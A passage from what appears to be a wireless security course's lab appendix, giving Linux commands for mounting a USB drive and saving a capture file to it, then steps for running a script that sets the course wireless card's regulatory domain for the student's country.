Mount the USB drive as shown below.

root@1[root]# mount -t vfat /dev/sda1 /mnt/thumb
root@1[root]#

A.1.6. Save Files to the USB Drive

When you want to save a file to the USB drive, simply copy it to the /mnt/thumb directory with the "cp" command, as shown below.

root@1[lab5]# cp lab5capture.cap /mnt/thumb
root@1[lab5]#

A.1.7. Unmount the USB Drive

Before removing the USB drive, you must unmount it. This will ensure there are no outstanding write operations pending and prevent you from losing data.

root@1[root]# umount /mnt/thumb
root@1[root]#

A.1.8. Remove the USB Drive

The USB drive is now safe to remove, with your data safely stored.

SWAT Kit - International Firmware Selection

The wireless cards distributed with the SWAT kit are restricted to transmit and monitor on the channels approved by the US Federal Communications Commission. Follow the instructions in this document to change the regulatory domain on the SWAT kit wireless card for your locale. To complete these steps, you will need the wireless card that was distributed with your SWAT kit as well as the bootable Linux CD-ROM used for lab exercises.

Step 1. Boot the Linux CD-ROM

Insert the course CD into your CD drive and restart your system, instructing the BIOS to boot from the CD. Once you have booted the Linux CD, open an xterm shell by clicking on the xterm button on the taskbar.

Step 2.
Insert the SWAT kit wireless card

Insert the SWAT kit wireless card into the PC Card or PCMCIA slot on your system.

Step 3. Execute the chregdom script

Execute the script designed to change the local regulatory domain by entering the following commands into your xterm window:

root@1[root]# cd /tmp/intl
root@1[intl]# ./chregdom.sh

Step 4. Answer prompts

The chregdom script will ask you to supply your wireless card interface name and the desired regulatory domain. Please supply this information as instructed.

NOTE: Most systems will recognize the SWAT kit wireless card as the "wlan0" interface. Some systems with built-in wireless cards (excluding Intel Centrino wireless cards) may have a naming conflict with the built-in wireless card. In these cases, your system may recognize your SWAT kit wireless card as "wlan1". You can determine what interface name is in use by running the "ifconfig -a" and "dmesg" commands on the system. Please seek the assistance of a proctor or the instructor if you need help.

After supplying the necessary information, the chregdom script will ask you to wait while it updates the wireless card. DO NOT interrupt this process; otherwise it is possible you could irrevocably damage your wireless card.